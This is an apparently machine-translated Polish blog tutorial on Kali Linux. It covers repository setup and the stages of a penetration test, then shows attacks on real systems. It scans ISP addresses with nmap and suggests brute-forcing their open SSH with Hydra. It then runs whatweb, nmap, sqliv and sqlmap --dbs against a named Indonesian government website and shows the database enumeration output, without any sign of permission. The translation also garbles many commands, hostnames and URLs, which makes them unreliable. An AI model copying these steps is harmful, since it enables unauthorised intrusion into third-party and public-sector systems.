Samouczek Kali Linux

Samouczek Kali Linux
Jeśli jesteś ekspertem lub przynajmniej zaznajomiony z Linuksem, poleceniami i środowiskiem, wystarczy zainstalować Kali Linux na swoim komputerze, chciał zostać mistrzem Kali Linux lub hakerem etycznym, jesteś we właściwym miejscu. W tym artykule omówię samouczek Kali Linux dla użytkowników Linuksa, którzy nie są jeszcze zaznajomieni z Kali i zacznij od niektórych podstawowych technik używanych do hakowania i testowania bezpieczeństwa podczas korzystania z Kali.

Cześć, jestem Bimando, autorem tego artykułu. Jeśli podoba Ci się ten artykuł, zapoznaj się z zakupem mojej książki praktyczne hakowanie etyczne: dla testerów penetracji z Kali Linux. Ciężko nad tym pracowałem z zespołem wskazów Linux, aby wyprodukować wysokiej jakości produkt, który wiem, że pokochasz go i dużo się nauczysz.


Co to jest Kali Linux?

Kali Linux (Po raz pierwszy wydany 13 marca 2013 r), który był formalnie znany jako BackTrack, opracowany przez firmę ochrony ofensywną, jest dystrybucją kryminalistyczną i bezpieczeństwa opartą na oddziale testowym Debiana. Kali Linux został zaprojektowany z myślą o testach penetracji, odzyskiwaniu danych i wykryciu zagrożeń. Projekt zmienił się na model Rolling Release na początku tego roku, aby zapewnić bardziej aktualne narzędzia bezpieczeństwa użytkownikom dystrybucji. Kali Linux jest bezpłatny i zawsze będzie. Ma ponad 600 narzędzi do testowania penetracji.

Dlaczego Kali Linux? Czy to jest dla Ciebie odpowiednie?

Kali Linux ostatnio zyskał dużą popularność. I jest przyczyna. Hacking powraca jako chłodne i-do-robo w kulturze popularnej, co można znacząco przypisać serialowi telewizyjnemu MR. Robot. Pan. Popularność robota pomogła Kali Linux w zdobyciu nowych użytkowników. Osoby, które nie wiedzą o Linuksie lub niczym związanym z bezpieczeństwem komputerowym, próbują teraz używać Kali jako głównego dystrybucji Linuksa.

„Nasz najbardziej zaawansowany rozkład testów penetracyjnych, kiedykolwiek." - Kali Linux Developers. (Jest napisane na stronie głównej Kali.org u góry strony.) Co otrzymujesz z tego stwierdzenia? Czy zauważasz to: APTD (rozkład testowania zaawansowanego penetracji)? Nie ma tu hakowania terminu dosłownie. Kali Linux jest taki sam jak inne rozkłady Linux. Po prostu powiedział, że jest to dystrybucja Linux pełna narzędzi związanych z bezpieczeństwem i skierowana do ekspertów ds. Bezpieczeństwa sieci i komputerów. Jednak użycie Kali Linux koncentruje się tylko na bezpieczeństwie i kryminalistyce.

Rozkład Linuksa to nic więcej niż pakiet zawierający jądro Linux, zestaw podstawowych narzędzi i aplikacji oraz niektóre ustawienia domyślne. Tak więc Kali Linux nie oferuje czegoś wyjątkowego w tym sensie, że większość dostarczonych narzędzi można zainstalować w dowolnym dystrybucji Linux.

Kali Linux jest specjalnie nastawiony na spełnienie wymagań profesjonalnych testów penetracji i kontroli bezpieczeństwa. Ma na celu określony podzbiór użytkowników Linuksa. Pentesters, hakerzy itp. Nie jest to zalecana dystrybucja, jeśli spodziewasz się KALI dla ogólnego pulpitu Linux do programowania, projektowania stron internetowych, gier, biura itp. Kali może dać ci wyzwania, nawet jeśli jesteś doświadczonym użytkownikiem Linuksa.

Rzeczy do zrobienia po zainstalowaniu Kali Linux

Po zainstalowaniu Kali Linux możesz się zastanawiać, co dalej z tym, prawda?. Wszyscy stoją przed tym problemem, nie martw się.

Krok 1: Skonfiguruj repozytorium

Po pierwsze, możesz już to wiedzieć, ale ważne jest prawidłowe ustawienie repozytorium. Jak powiedziałem, Model wydania Kali Linux jest w celu zapewnienia bardziej aktualnych narzędzi bezpieczeństwa użytkownikom dystrybucji. Zasadniczo, jeśli masz świeżo zainstalowane Kali Linux, repozytorium odwołuje się do mediów, których używasz do instalacji. Aby to naprawić, musisz zmienić repozytorium na oficjalne repozytorium Kali Linux. Wymagany plik jest zlokalizowany pod /etc/apt/źródła.lista. Otwórz plik za pomocą edytora tekstu Leafpad i wymień domyślne repozytorium na to oficjalne repozytorium Kali Rolling:

deb http: // http.Kali.Org/Kali Kali-Rolling Główny wkład nie wolny
# Aby uzyskać dostęp do pakietu źródłowego, pocukaj następujący wiersz
# deb-src http: // http.Kali.Org/Kali Kali-Rolling Główny wkład nie wolny

Krok 2: Zaktualizuj i zaktualizuj swoje Kali Linux

Po zaktualizowaniu i zaktualizowaniu systemu zsynchronizuj Kali Linux z najnowszą wersją. Aby to otworzyć terminal i wpisz:

Apt Aktualizacja -y && APT Upgrade -y && Apt Dist -Upgrade

Polecenie „apt aktualizacja” pobiera i pobiera pakiet wymienia informacje z repozytoriów i „aktualizuje” je, aby uzyskać informacje o najnowszych wersjach pakietów i ich zależnościach.

Polecenie „Apt Upgrade” pobiera i instaluje nowszą wersję pakietów zainstalowanych pakietów Kali Linux, o ile nie ma błędów w zależnościach.

„Apt Dist-Upgrade” zaktualizuje wszystkie pakiety do najnowszej dostępnej wersji bez względu na wszystko. A także zainstaluj i usuń zależności w razie potrzeby (instaluj zależności w celu zaspokojenia pakietów, ale także usuń zależności, które zostały osierocone, jeśli pakiet, który został zaktualizowany.

Podstawowa koncepcja testowania penetracji z Kali Linux

Po pomyślnym wykonaniu tych kroków istnieją trzy główne rzeczy, które możesz zrobić z Kali Linux na podstawie ukierunkowanego systemu, w tym:

  1. Hakowanie sieci bezprzewodowej - WIFI Hacking, Phising, ARP Zatrucie itp.
  2. Hakowanie aplikacji internetowych - Wtrysk SQL, fałszerstwo żądania między stronami (CSRF), phising internetowy itp.
  3. Hakowanie urządzeń - Wykorzystaj maszynę docelową, aby uzyskać kontrolę nad nim.

Nie włączam hakowania IoT, nie oznacza to, że Kali Linux nie ma w tym celu. Ale dosłownie może również należeć do hakowania urządzeń. Ponieważ urządzenie ma wygląd fizyczny i formę. W tym samouczku omówiłem ich podstawową wiedzę. Ponieważ Kali Linux jest ogromna, nie pasuje do jednego artykułu!

Musisz także wiedzieć, cykl lub procedura testowania penetracji. Oni są:

  1. Rozpoznanie - gromadzenie informacji
  2. Łów
  3. Eksploatacja
  4. Po eksploatacji

Hakowanie sieci bezprzewodowej z Kali Linux

Pod względem hakowania sieci bezprzewodowych ofiara może się różnić. Ponieważ sieci bezprzewodowe składają się z kilku rzeczy, takich jak dostawca usług internetowych (dostawca usług internetowych), router i jego „kumple” (modem, hub, przełącznik itp.) Oraz klientów (użytkownicy, CCTV, komputer zdalny itp.). Mają też wrażliwe możliwości.

Internet to duża i złożona agregacja sprzętu sieciowego, połączona ze sobą bramami. Śledzenie trasy, jaką podążają pakiety.

Kali Linux ma wbudowane narzędzie o nazwie TraceRoute. TraceRoute wykorzystuje pole protokołu IP „Time to Live” i próbuje wywołać odpowiedź ICMP Time_Exed z każdej bramy wzdłuż ścieżki do jakiegoś hosta. Traceroute próbuje prześledzić trasę, którą pakiet IP podążyłby do jakiegoś hosta internetowego, uruchamiając pakiety sondy z małym TTL (czas na żywo), a następnie słuchając odpowiedzi ICMP „przekroczony” z bramy. Dam ci i przykład, jak prześledzić router ISP używany do obsługi naszego połączenia za pomocą TraceRoute.

1. Rekonesans

Gromadzenie informacji jest najważniejszym początkiem skoku, nie przegap tego kroku. W tym etapie naszym celem jest uzyskanie jak najwięcej przydatnych informacji, które moglibyśmy uzyskać, a następnie informacje te są wykorzystywane do dalszych kroków.

Najpierw otwórz terminal i wpisz to polecenie, aby rozpocząć śledzenie „drogi” do strony, w tym przypadku ustawiam stronę na Google.com.

Taceroute Google.com

2. Łów

Po uruchomieniu poleceń będzie to wymienione w miejscu, w którym nasz pakiet zmierza sekwencja. Jak widać powyżej, mam 3 chmiel, który z nich to mój serwer ISP. Pierwszym adresem IP na liście jest mój router, który działa jak brama. A kolejne dwa z nich należą do mojego dostawcy dostawcy usług internetowych. Teraz sprawdźmy usługę, którą działają za pomocą NMAP. Tak więc cele, które zamierzamy skanować 10.152.192.1 I 10.13.223.102. W terminalu uruchomiłem następujące polecenie:

nmap -v -ss [IP Target] -pn

Rozbijmy argument polecenia:

-v = Włącz tryb gadatkowości

-SS = Użyj techniki skanowania TCP Syn

-Pn = traktuj wszystkich gospodarzy jako online - pomiń odkrycie gospodarza

A oto wynik, który otrzymaliśmy.

Niestety wszystkie porty 10.152.192.1 są filtrowane, oznacza to, że wszystkie przychodzące połączenia TCP są blokowane przez identyfikatory lub zaporę ogniową na tym IP. Teraz weźmy kolejny skan do drugiego celu.

3. Eksploatacja

W tej procedurze nie zamierzam prowadzić prawdziwego wyzysku, zamiast tego pokazuję, jak ci. Na podstawie powyższego wyniku skanowania NMAP wiemy, że ten adres IP ma serwer SSH działa na porcie 22 i jest otwarty. Jest otwarty, aby być brute, haha! Znaleźliśmy otwór, ten serwer SSH to możliwy otwór, do którego moglibyśmy uzyskać dostęp. Istnieje kilka narzędzi w Kali Linux, które obsługują ataki bruteforce lub słownikowe na protokół SSH. Jednym z najbardziej popularnych i potężnych jest „Hydra”.

Ok, to była podstawowa procedura przeprowadzająca test penetracyjny na docelowym serwerze, który w naszym przykładzie jest mój serwer ISP.

Hakowanie aplikacji internetowych z Kali Linux

Właściwie, jeśli pasjonujesz się tym, możesz skonfigurować swoje środowisko hakerskie, instalując DWVA (cholerna wrażliwa aplikacja internetowa) w Kali Linux. Jest to aplikacja internetowa PHP/MySQL, która ma garść wrażliwej dziury. Jego głównym celem jest pomoc dla specjalistów ds. Bezpieczeństwa w sprawdzeniu swoich umiejętności i narzędzi w środowisku prawnym oraz pomoc programistom stron internetowych lepiej zrozumieć procesy zabezpieczania aplikacji internetowych. Możesz dostać DWVA za darmo na github tutaj: https: // github.com/ethicalhack3r/dvwa.

Na razie pokażę, jak robić aplikacje internetowe hakowania na prawdziwej stronie. Ale obiecaj mi, że ogranicza się to tylko do celów edukacyjnych. Symulować prawdziwy atak na prawdziwym miejscu za pomocą wtrysku SQL.

Warunek wstępny

Narzędzia objęte:

- Whatweb (wstępnie zainstalowany)

- NMAP (wstępnie zainstalowany)

- SQLIV (instaluj ręcznie)

- SQLMAP (wstępnie zainstalowany)

Potrzebujemy jeszcze jednego dodatkowego narzędzia, które jest dostępne w GitHub tutaj: https: // github.com/hadesy2k/sqliv, zainstaluj go najpierw w naszym Kali Linux. To narzędzie o nazwie SQLIV, które jest w stanie wykonywać skanowanie ukierunkowane, zapewniając określoną domenę (z pełzaniem). Wpisz w terminalu:

Git Clone https: // github.com/hadesy2k/sqliv.git
CD SQLIV && sudo Python2.py -i

Target: www.Trenggalekkab.Iść.ID

1. Rekonesans

Zbieraj tyle przydatnych informacji, ile moglibyśmy. Możemy otworzyć stronę internetową i wykryć, jaka aplikacja działa na tej stronie. Po pierwsze, sprawdźmy, jaka to jest strona internetowa. Do tego użyjemy „Whatweb”.

Whatweb www.Trenggalekkab.Iść.ID

Jak widać powyższy wynik, cel znajduje się w Indonezji. To biega Apache v2.2.27 na swoim serwisie internetowym, a także ma PHP V5.4.31, ma adres IP 103.247.21.142. Okej, zwróć uwagę na to. Może być konieczne odwiedzenie jego strony internetowej, szukając pliku lub strony skonstruowanych, parametrów URL, a nawet formularza logowania. Na razie potrzebujemy tego adresu IP do następnego kroku, który jest skanowaniem.

2. Łów

Podobnie jak wcześniej, ponownie używamy NMAP, aby skanować to, co porty i usługi działają w celu.

nmap -v -ss 103.247.21.142

A oto wynik, który otrzymaliśmy:

Ukończony skan Syn Stealth o 21:22, 261.Upłynęło 93s (1000 portów)
Raport skanowania NMAP dla IP-103-247-21-142.Wifian.internet.ID (103.247.21.142)
Gospodarz jest w górę (0.069s opóźnienie).
Nie pokazano: 985 zamkniętych portów
Usługa państwa portowego
21/TCP Otwórz FTP
25/TCP Open SMTP
53/TCP Otwarta domena
80/TCP Otwórz HTTP
110/TCP Open Pop3
111/TCP Otwórz RPCBind
143/TCP Otwórz IMAP
212/TCP Open ANET
443/TCP Otwórz HTTPS
465/TCP Otwórz SMTPS
587/TCP Otwarte zgłoszenie
993/TCP Otwórz IMAPS
995/TCP Open Pop3s
3128/TCP filtrowane kałamarnicy
3306/TCP Otwórz mysql

Istnieje mnóstwo otwartych portów, które obsługują każdą usługę na celu, ale ten, który wygląda „przyciągający wzrok”, jest to, że usługa MySQL na porcie 3306. Wskazano, że ta strona używa Mysql Aby zarządzać swoimi informacjami w bazach danych. Zastanawiam się, czy na tej stronie istnieją jakieś luki wtryskowe SQL. Więc ponownie skanuję witrynę za pomocą SQLIV, którą właśnie zainstalowaliśmy. Wpisałem polecenie:

sqliv -t www.Trenggalekkab.Iść.ID

Na tej stronie znaleźliśmy 2 możliwe podatne adresy URL SQL. Zanotuj te adresy URL.

3. Eksploatacja

Ok, mamy wrażliwe adresy URL SQL i gotowe do wykonania. Aby to zrobić, będziemy używać sqlMap. Składnia to:

sqlmap „[wrażliwy adres URL]” - -DBS

Polecenie powinno wyglądać tak:

sqlmap -u "http: // www.Trenggalekkab.Iść.Id/Berita.php?strona = 208 " - -DBS

Argumentem „-DBS” jest poinformowanie SQLMAP o uzyskaniu docelowych baz danych. Oto dane wyjściowe:

[Informacje] Back-end DBMS to mysql
Technologia aplikacji internetowych: PHP 5.4.31, Apache 2.2.27
Back-end DBM: MySQL 5
[21:46:04] [Info] Pobieranie nazw baz danych
[21:46:04] [Info] Używane zapytanie SQL zwraca 2 wpisy
[21:46:04] [Info] Wznowienia: Information_Schema
[21:46:04] [Info] Wznowienia: Trengkab_trg
Dostępne bazy danych [2]:
[*] Information_Schema
[*] Trengkab_trg

SQLMAP znalazł 2 bazy danych, ale tylko jedna z nich, która zawiera poufne dane, takie jak konto modyfikowane administratora. To jest „trengkab_trg”. Po znalezieniu baz danych jest jeszcze kolejny krok. To znaczy znaleźć tabele i kolumny, a ostatnim krokiem jest zrzucenie danych. Nie pokażę ci, jak tutaj w tej sekcji, używając tego celu. Przynajmniej znasz podstawowy pomysł na cykl ataku i za pomocą niektórych narzędzi.

Hakowanie urządzeń

W przyszłym artykule na tej stronie omówimy hakowanie urządzeń, bądź na bieżąco. Jako przedarnowanie, będziesz chciał upewnić się, że znasz trochę do tego.